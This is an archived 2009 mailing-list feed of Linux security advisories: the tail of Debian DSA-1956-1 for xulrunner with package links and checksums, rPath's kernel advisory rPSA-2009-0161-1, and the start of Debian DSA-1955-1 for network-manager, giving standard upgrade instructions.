&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 145050 ebdb58e0370aef9bef4ebf5f2736f4ad
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223200 caf058f99c969d46b9a7a40f0d0e3fc8
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;7375656 83fea69a0f228bdd1f346cae0e4fce83
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3309390 02be3ae69ff0bb0e74511c90e65ee397
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 900198 c47c7a1172694e5bba824f8d8f0da98e
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 49967230 1aa11add1436ac50da0e7098b7858fcf
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;96810 d1d70a9ac6cd40722fd448822bb41d42
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;69892 1b8c2bd977102cfa5e84e227fbb95324
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 378640 18bf07b633c1eaa5a6766e0043491e1d
&lt;br&gt;&lt;br&gt;powerpc architecture (PowerPC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223186 a98c3d606008370b58426e68aa1d74eb
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;73036 420365b25bd6586f30ad15a532b7f711
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3283746 eb8cd1cc29aad06c45f912b39dd1d35c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;7276356 1ff0a306c07d06af8692c569e65e4370
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 887834 00ddf03b5858a38abb4c1268e14b8deb
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 362562 403794ddb64118af431bae437aa83f55
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;94824 68a744cc480c2bb91e5fccd0bbe2b8f7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 51392064 99becd6b3e9926f6b9ad06d35273bb96
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 152322 5496044d62fc184a0207d8a1f7b16528
&lt;br&gt;&lt;br&gt;s390 architecture (IBM S/390)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 105586 a049e14abd47bd52222d230d0ab5a779
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 406744 93ef047be735be315259b074218e86d7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;8389742 4eb282c84e3c7e9f152e4039517d1937
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223184 7286a158dab58e76054ed3af5ec04a09
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 909268 db230812204f07871e429bd7905ec502
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;72922 3c5bedcaba5e9ea016983a0f00f54f7c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 156154 3b6f6e83b5019f2b85ede8d18e7bb108
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3306442 8c65f811bc4738b29e2b380e278cacc4
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 51168676 4707184c455836b99d06075a06776866
&lt;br&gt;&lt;br&gt;sparc architecture (Sun SPARC/UltraSPARC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;88242 41d0bc936d44d0ae634785b40612c795
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 143282 658b3bbe4a734b9b1b17d7427d61baec
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 49355150 e2f70f19c1e526dc0bd2b324d25476e8
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 350094 0dcf1d199dabaa5207adfd370f391592
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3577426 9c84a634aacd4ec64592ca24f5bec695
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223282 4ca30dc0fc7989ee4045df25fa3df454
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;7175610 7ed182660d5e25fd16ffd5e65e3af587
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 821316 6fc3418c8abe57536e00b579970efaf9
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;69406 9a525e6314a592841214dc2c77186c8c
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; These files will probably be moved into the stable distribution on
&lt;br&gt;&amp;nbsp; its next update.
&lt;br&gt;&lt;br&gt;- ---------------------------------------------------------------------------------
&lt;br&gt;For apt-get: deb &lt;a href=&quot;http://security.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/&lt;/a&gt;&amp;nbsp;stable/updates main
&lt;br&gt;For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
&lt;br&gt;Mailing list: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26819122&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;debian-security-announce@...&lt;/a&gt;
&lt;br&gt;Package info: `apt-cache show &amp;lt;pkg&amp;gt;' and &lt;a href=&quot;http://packages.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://packages.debian.org/&lt;/a&gt;&amp;lt;pkg&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAkspTZ4ACgkQXm3vHE4uylrm8wCfVKheMHLpLTHd3MeFZGq6y80P
&lt;br&gt;BvcAniuJBQ2nKpm36u5nv+fxdnsn1RbL
&lt;br&gt;=aJ2S
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-SECURITY---DSA-1956-1--New-xulrunner-packages-fix-several-vulnerabilities-tp26819122p26819122.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26818966</id>
	<title>rPSA-2009-0161-1 hwdata kernel</title>
	<published>2009-12-16T11:20:28Z</published>
	<updated>2009-12-16T11:20:28Z</updated>
	<author>
		<name>rPath Update Announcements</name>
	</author>
	<content type="html">rPath Security Advisory: 2009-0161-1
&lt;br&gt;Published: 2009-12-16
&lt;br&gt;Products:
&lt;br&gt;&amp;nbsp; &amp;nbsp; rPath Appliance Platform Linux Service 1
&lt;br&gt;&amp;nbsp; &amp;nbsp; rPath Appliance Platform Linux Service 2
&lt;br&gt;&amp;nbsp; &amp;nbsp; rPath Linux 2
&lt;br&gt;&lt;br&gt;Rating: Critical
&lt;br&gt;Exposure Level Classification:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Remote Root Non-deterministic Denial of Service
&lt;br&gt;Updated Versions:
&lt;br&gt;&amp;nbsp; &amp;nbsp; hwdata=conary.rpath.com@rpl:1/0.225-0.4-1
&lt;br&gt;&amp;nbsp; &amp;nbsp; hwdata=conary.rpath.com@rpl:2/0.225-0.1-1
&lt;br&gt;&amp;nbsp; &amp;nbsp; hwdata=rap.rpath.com@rpath:linux-1/0.225-1-1
&lt;br&gt;&amp;nbsp; &amp;nbsp; hwdata=rap.rpath.com@rpath:linux-2/0.225-1-1
&lt;br&gt;&amp;nbsp; &amp;nbsp; kernel=conary.rpath.com@rpl:2/2.6.29.6-0.7-1
&lt;br&gt;&amp;nbsp; &amp;nbsp; kernel=rap.rpath.com@rpath:linux-1/2.6.29.6-8-1
&lt;br&gt;&amp;nbsp; &amp;nbsp; kernel=rap.rpath.com@rpath:linux-2/2.6.29.6-3-1
&lt;br&gt;&lt;br&gt;rPath Issue Tracking System:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &lt;a href=&quot;https://issues.rpath.com/browse/RPL-3154&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://issues.rpath.com/browse/RPL-3154&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &lt;a href=&quot;https://issues.rpath.com/browse/RPL-3156&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://issues.rpath.com/browse/RPL-3156&lt;/a&gt;&lt;br&gt;&lt;br&gt;References:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1298&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1298&lt;/a&gt;&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Previous kernel versions in the 2.6.29 series are vulnerable to a remote
&lt;br&gt;&amp;nbsp; &amp;nbsp; Denial-of-Service attack (NULL pointer dereference and hang) via long IP
&lt;br&gt;&amp;nbsp; &amp;nbsp; packets. &amp;nbsp;This has been fixed.
&lt;br&gt;&amp;nbsp; &amp;nbsp; 
&lt;br&gt;&amp;nbsp; &amp;nbsp; Also, support for some new AHCI SATA controllers has been added in this
&lt;br&gt;&amp;nbsp; &amp;nbsp; update.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://wiki.rpath.com/Advisories:rPSA-2009-0161&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://wiki.rpath.com/Advisories:rPSA-2009-0161&lt;/a&gt;&lt;br&gt;&lt;br&gt;Copyright 2009 rPath, Inc.
&lt;br&gt;This file is distributed under the terms of the MIT License.
&lt;br&gt;A copy is available at &lt;a href=&quot;http://www.rpath.com/permanent/mit-license.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.rpath.com/permanent/mit-license.html&lt;/a&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/rPSA-2009-0161-1-hwdata-kernel-tp26818966p26818966.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26815525</id>
	<title>[SECURITY] [DSA 1955-1] New network-manager/network-manager-applet packages fix information disclosure</title>
	<published>2009-12-16T09:27:35Z</published>
	<updated>2009-12-16T09:27:35Z</updated>
	<author>
		<name>Steffen Joeris-3</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Debian Security Advisory DSA-1955-1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26815525&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;
&lt;br&gt;&lt;a href=&quot;http://www.debian.org/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Steffen Joeris
&lt;br&gt;December 16, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.debian.org/security/faq&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/faq&lt;/a&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Package &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: network-manager/network-manager-applet
&lt;br&gt;Vulnerability &amp;nbsp;: information disclosure
&lt;br&gt;Problem type &amp;nbsp; : local
&lt;br&gt;Debian-specific: no
&lt;br&gt;CVE Id &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; : CVE-2009-0365
&lt;br&gt;Debian Bug &amp;nbsp; &amp;nbsp; : 519801
&lt;br&gt;&lt;br&gt;It was discovered that network-manager-applet, a network management
&lt;br&gt;framework, lacks some dbus restriction rules, which allows local users
&lt;br&gt;to obtain sensitive information.
&lt;br&gt;&lt;br&gt;If you have locally modified the /etc/dbus-1/system.d/nm-applet.conf
&lt;br&gt;file, then please make sure that you merge the changes from this fix
&lt;br&gt;when asked during upgrade.
&lt;br&gt;&lt;br&gt;&lt;br&gt;For the stable distribution (lenny), this problem has been fixed in
&lt;br&gt;version 0.6.6-4+lenny1 of network-manager-applet.
&lt;br&gt;&lt;br&gt;For the oldstable distribution (etch), this problem has been fixed in
&lt;br&gt;version 0.6.4-6+etch1 of network-manager.
&lt;br&gt;&lt;br&gt;For the testing distribution (squeeze) and the unstable distribution
&lt;br&gt;(sid), this problem has been fixed in version 0.7.0.99-1 of
&lt;br&gt;network-manager-applet.
&lt;br&gt;&lt;br&gt;&lt;br&gt;We recommend that you upgrade your network-manager and
&lt;br&gt;network-manager-applet packages accordingly.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Upgrade instructions
&lt;br&gt;- --------------------
&lt;br&gt;&lt;br&gt;wget url
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will fetch the file for you
&lt;br&gt;dpkg -i file.deb
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install the referenced file.
&lt;br&gt;&lt;br&gt;If you are using the apt-get package manager, use the line for
&lt;br&gt;sources.list as given below:
&lt;br&gt;&lt;br&gt;apt-get update
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will update the internal database
&lt;br&gt;apt-get upgrade
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install corrected packages
&lt;br&gt;&lt;br&gt;You may use an automated update by adding the resources from the
&lt;br&gt;footer to the proper configuration.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 4.0 alias etch
&lt;br&gt;- -------------------------------
&lt;br&gt;&lt;br&gt;Debian (oldstable)
&lt;br&gt;- ------------------
&lt;br&gt;&lt;br&gt;Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 1034 9ca281c6a38a498e5735a9e8caa4b7bc
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;20424 448d010bfa385c406fad97b0c9667731
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;1079499 2d8ec8b17f85ee9aa9c0e04c63b98c3a
